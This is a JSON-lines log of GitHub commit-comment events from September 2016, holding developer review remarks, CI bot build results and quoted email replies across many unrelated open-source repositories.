{"id":"4559423860","type":"CommitCommentEvent","actor":{"login":"airen"},"repo":{"name":"W3cplus/SassMagic"},"payload":{"comment":{"id":19011902,"position":null,"line":null,"path":null,"commit_id":"d2578200926fd3c45b1e58c2ca8ec332ec605e91","created_at":"2016-09-14T02:08:50Z","updated_at":"2016-09-14T02:08:50Z","body":"Thank you very much"}},"created_at":"2016-09-14T02:08:50Z"}
{"id":"4559425900","type":"CommitCommentEvent","actor":{"login":"jak103"},"repo":{"name":"FabioCZ/jarvis"},"payload":{"comment":{"id":19011914,"position":null,"line":null,"path":null,"commit_id":"2ce09bd3db1cb1dc7ed65fdbcf3c2363f47a70d1","created_at":"2016-09-14T02:09:36Z","updated_at":"2016-09-14T02:09:36Z","body":"My only hesitation is long term maintenance. What happens after you\ngraduate? I'd actually have to learn angular... *gasp*\n\nOn Tue, Sep 13, 2016 at 7:22 AM, Fabio Göttlicher <notifications@github.com>\nwrote:\n\n> It's just something I am playing with. I might scrap it altogether. We'll\n> see...\n>\n> On Sep 12, 2016 10:15 PM, \"Jacob Christensen\" <notifications@github.com>\n> wrote:\n>\n> > That's a lot of code for a pretty simple interface. I'm not sure how I\n> > feel about it.\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/FabioCZ/jarvis/commit/2ce09bd3db1cb1dc7ed65fdbcf3c23\n> 63f47a70d1#commitcomment-18995814>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> ABYizJA4ykamCr4Eu0qiZYNNZrcM5oPfks5qpiM-gaJpZM4J7Rn4>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/FabioCZ/jarvis/commit/2ce09bd3db1cb1dc7ed65fdbcf3c2363f47a70d1#commitcomment-19001339>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA64q6eYN59akV6AfAURuqNP1wsqo3_Dks5qpqOegaJpZM4J7Rn4>\n> .\n>\n"}},"created_at":"2016-09-14T02:09:36Z"}
{"id":"4559426455","type":"CommitCommentEvent","actor":{"login":"jipenghu"},"repo":{"name":"jipenghu/test"},"payload":{"comment":{"id":19011917,"position":null,"line":null,"path":null,"commit_id":"cdfec1c76fa02df06d85dc3bd3bfd80de01439fe","created_at":"2016-09-14T02:09:49Z","updated_at":"2016-09-14T02:09:49Z","body":"呵呵"}},"created_at":"2016-09-14T02:09:49Z"}
{"id":"4559431541","type":"CommitCommentEvent","actor":{"login":"founderbo"},"repo":{"name":"founderbo/szbj"},"payload":{"comment":{"id":19011931,"position":null,"line":null,"path":null,"commit_id":"2cca9f6296353fd2e91fa23f293f2597a92b22da","created_at":"2016-09-14T02:11:49Z","updated_at":"2016-09-14T02:11:49Z","body":"yang"}},"created_at":"2016-09-14T02:11:49Z"}
{"id":"4559435757","type":"CommitCommentEvent","actor":{"login":"milktrader"},"repo":{"name":"JuliaStats/TimeSeries.jl"},"payload":{"comment":{"id":19011937,"position":14,"line":28,"path":"test/timearray.jl","commit_id":"42fc178eccbad57d098b50b6dafbcebd7a3d2380","created_at":"2016-09-14T02:13:24Z","updated_at":"2016-09-14T02:13:24Z","body":"Lemme check"}},"created_at":"2016-09-14T02:13:24Z"}
{"id":"4559436371","type":"CommitCommentEvent","actor":{"login":"huacnlee"},"repo":{"name":"ruby-china/ruby-china"},"payload":{"comment":{"id":19011939,"position":4,"line":468,"path":"spec/lib/markdown_spec.rb","commit_id":"48ab354417e01734902bb5fba8b1e2ae58b4c48c","created_at":"2016-09-14T02:13:37Z","updated_at":"2016-09-14T02:13:37Z","body":"... 编辑器没配置好，最近刚换 Vim"}},"created_at":"2016-09-14T02:13:37Z"}
{"id":"4559437093","type":"CommitCommentEvent","actor":{"login":"levity"},"repo":{"name":"Hylozoic/hylo-redux"},"payload":{"comment":{"id":19011942,"position":null,"line":null,"path":null,"commit_id":"6b408f98aff539bdbe64d0d7d4619963f0238ef5","created_at":"2016-09-14T02:13:53Z","updated_at":"2016-09-14T02:13:53Z","body":"@robbiecarlton just wanted to note a few things here (just skim this diff, i know it's huge):\r\n\r\n1) the addDataToStore middleware is working pretty well to decouple reducer logic from the shape of API responses -- let's do more of this\r\n\r\n2) i'm noticing that it feels pretty good to have the local storage normalized, and then when it comes to rendering, reassemble an object in a connect decorator using reusable functions that live in the models/ folder, so that we can still call \"post.user\" and so forth naturally"}},"created_at":"2016-09-14T02:13:53Z"}
{"id":"4559439049","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaStats/TimeSeries.jl"},"payload":{"comment":{"id":19011945,"position":14,"line":28,"path":"test/timearray.jl","commit_id":"42fc178eccbad57d098b50b6dafbcebd7a3d2380","created_at":"2016-09-14T02:14:38Z","updated_at":"2016-09-14T02:14:38Z","body":"I ask because the `push!` to `push` change doesn't make much sense at a glance"}},"created_at":"2016-09-14T02:14:38Z"}
{"id":"4559440850","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19011946,"position":null,"line":null,"path":null,"commit_id":"db768200abb4d32e262b89f1d9491e97b11f3d89","created_at":"2016-09-14T02:15:20Z","updated_at":"2016-09-14T02:15:20Z","body":"`__OPTIMIZE_SIZE__` is defined under GCC and compatibles when using `-Os`."}},"created_at":"2016-09-14T02:15:20Z"}
{"id":"4559442556","type":"CommitCommentEvent","actor":{"login":"wenweih"},"repo":{"name":"ruby-china/ruby-china"},"payload":{"comment":{"id":19011951,"position":4,"line":468,"path":"spec/lib/markdown_spec.rb","commit_id":"48ab354417e01734902bb5fba8b1e2ae58b4c48c","created_at":"2016-09-14T02:15:56Z","updated_at":"2016-09-14T02:15:56Z","body":"..."}},"created_at":"2016-09-14T02:15:56Z"}
{"id":"4559446518","type":"CommitCommentEvent","actor":{"login":"songjiayang"},"repo":{"name":"ruby-china/ruby-china"},"payload":{"comment":{"id":19011956,"position":4,"line":468,"path":"spec/lib/markdown_spec.rb","commit_id":"48ab354417e01734902bb5fba8b1e2ae58b4c48c","created_at":"2016-09-14T02:17:29Z","updated_at":"2016-09-14T02:17:29Z","body":"我觉得有必要添加添加一个 git conf 来处理 tabsize 以及endinglines 问题"}},"created_at":"2016-09-14T02:17:29Z"}
{"id":"4559446540","type":"CommitCommentEvent","actor":{"login":"li-kai"},"repo":{"name":"li-kai/addressbook-level3"},"payload":{"comment":{"id":19011957,"position":null,"line":null,"path":null,"commit_id":"a6e014932fcfd9c3e9ec24717077a66b7bb4968e","created_at":"2016-09-14T02:17:30Z","updated_at":"2016-09-14T02:17:30Z","body":"No 5 is a Functional Requirement. If it can be phrased as a user story, then it is one."}},"created_at":"2016-09-14T02:17:30Z"}
{"id":"4559448162","type":"CommitCommentEvent","actor":{"login":"milktrader"},"repo":{"name":"JuliaStats/TimeSeries.jl"},"payload":{"comment":{"id":19011961,"position":14,"line":28,"path":"test/timearray.jl","commit_id":"42fc178eccbad57d098b50b6dafbcebd7a3d2380","created_at":"2016-09-14T02:18:10Z","updated_at":"2016-09-14T02:18:10Z","body":"`dupestamp` and `mangstamp` are no longer defined in the test suite.\r\n\r\n````[test (master)] \r\n✈  ack dupestamp\r\ntimearray.jl\r\n28:        @fact_throws TimeArray(dupestamp, push(cl.values, cl.values[1]), [\"Close\"])\r\n[test (master)] \r\n✈  ack mangstamp\r\ntimearray.jl\r\n32:        @fact_throws TimeArray(mangstamp,  push(cl.values, cl.values[1]), [\"Close\"])\r\n````"}},"created_at":"2016-09-14T02:18:10Z"}
{"id":"4559456737","type":"CommitCommentEvent","actor":{"login":"milktrader"},"repo":{"name":"JuliaStats/TimeSeries.jl"},"payload":{"comment":{"id":19011977,"position":14,"line":28,"path":"test/timearray.jl","commit_id":"42fc178eccbad57d098b50b6dafbcebd7a3d2380","created_at":"2016-09-14T02:21:25Z","updated_at":"2016-09-14T02:21:25Z","body":"Also not sure about why `push!` became `push`. "}},"created_at":"2016-09-14T02:21:25Z"}
{"id":"4559458141","type":"CommitCommentEvent","actor":{"login":"synnz"},"repo":{"name":"lastsunset/uniplug"},"payload":{"comment":{"id":19011980,"position":5,"line":41,"path":"index.php","commit_id":"deec4637426d104e28cdf0db7100e041f214e317","created_at":"2016-09-14T02:21:58Z","updated_at":"2016-09-14T02:21:58Z","body":"**_# Агонь!_**"}},"created_at":"2016-09-14T02:21:58Z"}
{"id":"4559463015","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19011989,"position":null,"line":null,"path":null,"commit_id":"79fa859bb0621903ea4191dc40bf75ae1c63a579","created_at":"2016-09-14T02:23:49Z","updated_at":"2016-09-14T02:23:49Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1762 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-14T02:23:49Z"}
{"id":"4559464869","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19011993,"position":null,"line":null,"path":null,"commit_id":"00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e","created_at":"2016-09-14T02:24:30Z","updated_at":"2016-09-14T02:24:30Z","body":"5626-Plant-HX-min-DT (mjwitte) - x86_64-MacOS-10.9-clang: OK (2330 of 2330 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-14T02:24:30Z"}
{"id":"4559466676","type":"CommitCommentEvent","actor":{"login":"rtlanceroad"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19012000,"position":null,"line":null,"path":null,"commit_id":"7a58c9cc534372dd6e772310b510a995edbac19d","created_at":"2016-09-14T02:25:13Z","updated_at":"2016-09-14T02:25:13Z","body":"I tried to implement redshift with geoclue2 support, installation is fine, but my effort seems in vain. here is the message I got from command line running `redshift-gtk`:\r\n\r\n```\r\nFailed to run Redshift\r\nTrying location provider `geoclue2'...\r\nUnable to connect to GeoClue.\r\nUnable to get location from provider.\r\n```\r\nAnyway, I tried."}},"created_at":"2016-09-14T02:25:13Z"}
{"id":"4559470270","type":"CommitCommentEvent","actor":{"login":"milktrader"},"repo":{"name":"JuliaStats/TimeSeries.jl"},"payload":{"comment":{"id":19012013,"position":14,"line":28,"path":"test/timearray.jl","commit_id":"42fc178eccbad57d098b50b6dafbcebd7a3d2380","created_at":"2016-09-14T02:26:35Z","updated_at":"2016-09-14T02:26:35Z","body":"`push` is not even a method, very strange"}},"created_at":"2016-09-14T02:26:35Z"}
{"id":"4559475646","type":"CommitCommentEvent","actor":{"login":"stevengj"},"repo":{"name":"JuliaLang/julialang.github.com"},"payload":{"comment":{"id":19012023,"position":null,"line":null,"path":null,"commit_id":"ca3645931ec15642f99c186592e3e20edaaa9ded","created_at":"2016-09-14T02:28:34Z","updated_at":"2016-09-14T02:28:34Z","body":"This screenshot really needs to be updated..."}},"created_at":"2016-09-14T02:28:34Z"}
{"id":"4559477052","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19012027,"position":null,"line":null,"path":null,"commit_id":"95f072abb0192f17857b740e1518a81fcc0c618d","created_at":"2016-09-14T02:29:04Z","updated_at":"2016-09-14T02:29:04Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 28](http://teamcity.otenv.com/viewLog.html?buildId=5209909&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-14T02:29:04Z"}
{"id":"4559477623","type":"CommitCommentEvent","actor":{"login":"Alien-Chen"},"repo":{"name":"Alien-Chen/coco"},"payload":{"comment":{"id":19012029,"position":1,"line":1,"path":"README.md","commit_id":"becf63cb94d40979f1a69fff42e91ecfc28dec2e","created_at":"2016-09-14T02:29:16Z","updated_at":"2016-09-14T02:29:16Z","body":"fklkasl"}},"created_at":"2016-09-14T02:29:16Z"}
{"id":"4559478476","type":"CommitCommentEvent","actor":{"login":"Alien-Chen"},"repo":{"name":"Alien-Chen/coco"},"payload":{"comment":{"id":19012030,"position":1,"line":1,"path":"README.md","commit_id":"becf63cb94d40979f1a69fff42e91ecfc28dec2e","created_at":"2016-09-14T02:29:37Z","updated_at":"2016-09-14T02:29:37Z","body":"ddd"}},"created_at":"2016-09-14T02:29:37Z"}
{"id":"4559480519","type":"CommitCommentEvent","actor":{"login":"milktrader"},"repo":{"name":"JuliaStats/TimeSeries.jl"},"payload":{"comment":{"id":19012033,"position":14,"line":28,"path":"test/timearray.jl","commit_id":"42fc178eccbad57d098b50b6dafbcebd7a3d2380","created_at":"2016-09-14T02:30:21Z","updated_at":"2016-09-14T02:30:21Z","body":"Issue https://github.com/JuliaStats/TimeSeries.jl/issues/284 has been filed"}},"created_at":"2016-09-14T02:30:21Z"}
{"id":"4559480588","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012034,"position":null,"line":null,"path":null,"commit_id":"d1330a0bfe6e42c227c3115b40299a6035bf4190","created_at":"2016-09-14T02:30:23Z","updated_at":"2016-09-14T02:30:23Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T02:30:23Z"}
{"id":"4559481142","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19012037,"position":null,"line":null,"path":null,"commit_id":"95f072abb0192f17857b740e1518a81fcc0c618d","created_at":"2016-09-14T02:30:35Z","updated_at":"2016-09-14T02:30:35Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 28](http://teamcity.otenv.com/viewLog.html?buildId=5209909&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:01:31"}},"created_at":"2016-09-14T02:30:35Z"}
{"id":"4559484878","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012045,"position":null,"line":null,"path":null,"commit_id":"69c685c242f9be19d8e1f66481a2c106ab588ea6","created_at":"2016-09-14T02:31:55Z","updated_at":"2016-09-14T02:31:55Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - i386-Windows-7-VisualStudio-12: OK (2332 of 2335 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: ZSZ big diffs.\n * 3 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T02:31:55Z"}
{"id":"4559490146","type":"CommitCommentEvent","actor":{"login":"SandKierkegaard"},"repo":{"name":"consp1racy/android-support-preference"},"payload":{"comment":{"id":19012057,"position":null,"line":null,"path":null,"commit_id":"75dd33c59cd72c9674190d29789f715f7a42e9fe","created_at":"2016-09-14T02:33:55Z","updated_at":"2016-09-14T02:33:55Z","body":"supportLibVersion = \"24.2.0\" \r\nThis is causing troubles after the build tools upgrade.\r\nPlease update to version 24.2.1"}},"created_at":"2016-09-14T02:33:55Z"}
{"id":"4559492848","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"node-machine/machine"},"payload":{"comment":{"id":19012060,"position":null,"line":null,"path":null,"commit_id":"0cbf0fb7f5ffe0fbf6cbd9abe86c74d4879a6632","created_at":"2016-09-14T02:34:52Z","updated_at":"2016-09-14T02:34:52Z","body":"@sgress454 this commit broke the execSync tests-- not exactly sure why yet\r\n\r\ne.g.\r\n\r\n```\r\nmachine: ∑ mocha test/execSync.test.js \r\n\r\n\r\n  2 passing (56ms)\r\n  6 failing\r\n\r\n  1) Machine.prototype.execSync() should throw an Error when called on a configured machine that triggers any non-success exit and sends back an Error instance:\r\n     AssertionError: Missing expected exception..\r\n      at Function._throws (assert.js:315:5)\r\n      at Function.assert.throws (assert.js:332:11)\r\n      at Context.<anonymous> (test/execSync.test.js:29:12)\r\n\r\n...\r\n...\r\n...\r\n....etc\r\n\r\n```"}},"created_at":"2016-09-14T02:34:52Z"}
{"id":"4559499219","type":"CommitCommentEvent","actor":{"login":"jcfr"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":19012067,"position":null,"line":null,"path":null,"commit_id":"9ddef80ead98077acd4611b7b2aa4e4353b4b70a","created_at":"2016-09-14T02:37:08Z","updated_at":"2016-09-14T02:37:08Z","body":":+1: "}},"created_at":"2016-09-14T02:37:08Z"}
{"id":"4559499933","type":"CommitCommentEvent","actor":{"login":"237444405"},"repo":{"name":"237444405/xiedong"},"payload":{"comment":{"id":19012068,"position":null,"line":null,"path":null,"commit_id":"eaed04ca077cda89b4afdcef217543bf41c07910","created_at":"2016-09-14T02:37:24Z","updated_at":"2016-09-14T02:37:24Z","body":"1"}},"created_at":"2016-09-14T02:37:24Z"}
{"id":"4559504784","type":"CommitCommentEvent","actor":{"login":"SandKierkegaard"},"repo":{"name":"consp1racy/android-support-preference"},"payload":{"comment":{"id":19012082,"position":null,"line":null,"path":null,"commit_id":"75dd33c59cd72c9674190d29789f715f7a42e9fe","created_at":"2016-09-14T02:39:09Z","updated_at":"2016-09-14T02:39:09Z","body":"@consp1racy "}},"created_at":"2016-09-14T02:39:09Z"}
{"id":"4559516869","type":"CommitCommentEvent","actor":{"login":"TechQuery"},"repo":{"name":"sentsin/layui"},"payload":{"comment":{"id":19012099,"position":null,"line":null,"path":null,"commit_id":"e9d0e1bdb3f4de1ad26ad3e077e2944469155f5a","created_at":"2016-09-14T02:43:29Z","updated_at":"2016-09-14T02:43:29Z","body":"@sentsin 大神可以尝试用一下基于 jQuery API 的**抽象视图接口对象**，把一些机械重复的底层工作交出去，精简上层控件代码的同时，还能很方便地通过 **通用接口**与其它库“低耦”交互~\r\n\r\n - 实现源码 —— https://github.com/TechQuery/iQuery.js/blob/master/iQuery%2B.js\r\n - 接口文档 —— https://github.com/TechQuery/iQuery.js/tree/master/doc/data"}},"created_at":"2016-09-14T02:43:29Z"}
{"id":"4559521447","type":"CommitCommentEvent","actor":{"login":"themightychris"},"repo":{"name":"substack/pushover"},"payload":{"comment":{"id":19012102,"position":7,"line":16,"path":"lib/service.js","commit_id":"14b8e0ba06f0a70f3ede7ecf2535bb3f991ba761","created_at":"2016-09-14T02:45:12Z","updated_at":"2016-09-14T02:45:12Z","body":"@juliangruber @distracteddev I've been doing some work with [git-http-backend](https://github.com/substack/git-http-backend) and ran into this receive-pack regex causing two seperate problems:\r\n- it doesn't match when pushing refs that aren't tags or branches\r\n- it cuts off the ref name when any branch/tag/ref contains the string `00` due to the non-greedy `.*?` stopping as soon as it matches `00` as a possible next sequence\r\n\r\nI made a commit (substack/git-http-backend@720ae7827caca34546895ac01dab2e727c45c315)  to git-http-backend adjusting this regex so I could push arbitrary refs and branch names that might contain `00`, but I left the `00` in `( |00|\\u0000)` because I couldn't explain it being there. I can't find/imagine any case where a ref name could be immediately followed by a `00` that wouldn't be part of the ref name\r\n\r\nBased on the (relatively limited) git traffic I've seen, it seems like a good pattern would be: `(refs\\/((heads|tags)\\/)?[^\\s\\u0000]+)[\\s\\u0000]` -- have either of you seen cases where that wouldn't work?"}},"created_at":"2016-09-14T02:45:12Z"}
{"id":"4559523466","type":"CommitCommentEvent","actor":{"login":"wmdietl"},"repo":{"name":"typetools/checker-framework"},"payload":{"comment":{"id":19012104,"position":11,"line":591,"path":"framework/src/org/checkerframework/framework/util/typeinference/DefaultTypeArgumentInference.java","commit_id":"2d2825ee0139d58ba4e9ed385e2da60745cb2300","created_at":"2016-09-14T02:45:53Z","updated_at":"2016-09-14T02:45:53Z","body":"It's a bit surprising that the subtype and supertype arguments in the call to `TypesUtils.isErasedSubtype` is different from the invocation of `typeHierarchy.isSubtype`. Doesn't that mean that the erased type of the two will be the same?\r\nCan you add a comment why this is the right order?"}},"created_at":"2016-09-14T02:45:53Z"}
{"id":"4559526844","type":"CommitCommentEvent","actor":{"login":"gkhandelwal"},"repo":{"name":"gkhandelwal/HoneyBeeLoadBalancer"},"payload":{"comment":{"id":19012107,"position":null,"line":null,"path":null,"commit_id":"65d04f0b8eaaa71ef353cc3c1c92f446b2069356","created_at":"2016-09-14T02:47:05Z","updated_at":"2016-09-14T02:47:05Z","body":"It was a project and there is no paper for this project.\n\nOn Fri, Sep 9, 2016 at 6:52 AM, Atyaf-dhari <notifications@github.com>\nwrote:\n\n> Hello, please where can I get the paper of this project\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gkhandelwal/HoneyBeeLoadBalancer/commit/65d04f0b8eaaa71ef353cc3c1c92f446b2069356#commitcomment-18961343>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGOEbWYyY51Dvg7cxRqThR6STlLSg7Tgks5qoUhjgaJpZM4J4-FK>\n> .\n>\n"}},"created_at":"2016-09-14T02:47:05Z"}
{"id":"4559531417","type":"CommitCommentEvent","actor":{"login":"sj26"},"repo":{"name":"ged/ruby-pg"},"payload":{"comment":{"id":19012112,"position":15,"line":46,"path":"lib/pg/text_decoder.rb","commit_id":"6d36d7c180ce117b98f08b878b39fdd512f1a39c","created_at":"2016-09-14T02:48:51Z","updated_at":"2016-09-14T02:48:51Z","body":"This should probably use `::JSON.parse(string, quirks_mode: true)` to prevent `create_additions` allowing arbitrary ruby object loading."}},"created_at":"2016-09-14T02:48:51Z"}
{"id":"4559531420","type":"CommitCommentEvent","actor":{"login":"epintozzi"},"repo":{"name":"dshinzie/headcount"},"payload":{"comment":{"id":19012111,"position":20,"line":28,"path":"lib/enrollment_repository.rb","commit_id":"7f0ad96f47a508e0f0c6547b4391322bd28c96fd","created_at":"2016-09-14T02:48:51Z","updated_at":"2016-09-14T02:48:51Z","body":"Replaced by line 16"}},"created_at":"2016-09-14T02:48:51Z"}
{"id":"4559531790","type":"CommitCommentEvent","actor":{"login":"epintozzi"},"repo":{"name":"dshinzie/headcount"},"payload":{"comment":{"id":19012113,"position":24,"line":32,"path":"lib/enrollment_repository.rb","commit_id":"7f0ad96f47a508e0f0c6547b4391322bd28c96fd","created_at":"2016-09-14T02:49:00Z","updated_at":"2016-09-14T02:49:00Z","body":"Replaced by line 17"}},"created_at":"2016-09-14T02:49:00Z"}
{"id":"4559532671","type":"CommitCommentEvent","actor":{"login":"epintozzi"},"repo":{"name":"dshinzie/headcount"},"payload":{"comment":{"id":19012115,"position":34,"line":48,"path":"lib/enrollment_repository.rb","commit_id":"7f0ad96f47a508e0f0c6547b4391322bd28c96fd","created_at":"2016-09-14T02:49:21Z","updated_at":"2016-09-14T02:49:21Z","body":"Unused/carried over from district_repo file and is not needed at this time."}},"created_at":"2016-09-14T02:49:21Z"}
{"id":"4559532824","type":"CommitCommentEvent","actor":{"login":"sj26"},"repo":{"name":"ged/ruby-pg"},"payload":{"comment":{"id":19012117,"position":15,"line":30,"path":"lib/pg/text_encoder.rb","commit_id":"6d36d7c180ce117b98f08b878b39fdd512f1a39c","created_at":"2016-09-14T02:49:24Z","updated_at":"2016-09-14T02:49:24Z","body":"Similarly, this should probably use `::JSON.stringify(value, quirks_mode: true)` to prevent `create_additions` allowing arbitrary ruby object serialization."}},"created_at":"2016-09-14T02:49:24Z"}
{"id":"4559533318","type":"CommitCommentEvent","actor":{"login":"epintozzi"},"repo":{"name":"dshinzie/headcount"},"payload":{"comment":{"id":19012118,"position":15,"line":23,"path":"lib/enrollment_repository.rb","commit_id":"7f0ad96f47a508e0f0c6547b4391322bd28c96fd","created_at":"2016-09-14T02:49:35Z","updated_at":"2016-09-14T02:49:35Z","body":"Replaced by lines 16 and 17"}},"created_at":"2016-09-14T02:49:35Z"}
{"id":"4559534888","type":"CommitCommentEvent","actor":{"login":"mleblanc03"},"repo":{"name":"mleblanc03/compstat2016"},"payload":{"comment":{"id":19012122,"position":null,"line":null,"path":null,"commit_id":"3f2056637764100c91dc0957e0fb8b0ced2dd2cd","created_at":"2016-09-14T02:50:16Z","updated_at":"2016-09-14T02:50:16Z","body":"https://mleblanc.shinyapps.io/tarea_simulexp/"}},"created_at":"2016-09-14T02:50:16Z"}
{"id":"4559541292","type":"CommitCommentEvent","actor":{"login":"calaway"},"repo":{"name":"bfpepper/little-shop"},"payload":{"comment":{"id":19012128,"position":null,"line":null,"path":null,"commit_id":"fbd1d16faa1510268cd526536f811a5509c66343","created_at":"2016-09-14T02:52:41Z","updated_at":"2016-09-14T02:52:41Z","body":"Hey @case-eee or @s-espinosa, quick routing question for one of you. No rush, it can certainly wait until tomorrow.\r\n\r\nWe're thinking about handling our cart by namespacing items under cart. So we would have:\r\n```\r\nnamespace :cart do\r\n  resources :items, only: [:create, :index, :show]\r\nend\r\n```\r\nThis seems like a good idea to me, but I want to check in to make sure we're going down the right path (pun intended). I imagine if this is wrong we'll want to correct it sooner rather than later.\r\nThank you!"}},"created_at":"2016-09-14T02:52:41Z"}
{"id":"4559552997","type":"CommitCommentEvent","actor":{"login":"hongyanhua511"},"repo":{"name":"xmymsd/HTML5"},"payload":{"comment":{"id":19012135,"position":1,"line":1,"path":"README.md","commit_id":"42823e6261e2c1c1551833fd60fe02eb116371a6","created_at":"2016-09-14T02:57:01Z","updated_at":"2016-09-14T02:57:01Z","body":"3333"}},"created_at":"2016-09-14T02:57:01Z"}
{"id":"4559560326","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012163,"position":null,"line":null,"path":null,"commit_id":"d1330a0bfe6e42c227c3115b40299a6035bf4190","created_at":"2016-09-14T02:59:54Z","updated_at":"2016-09-14T02:59:54Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-14T02:59:54Z"}
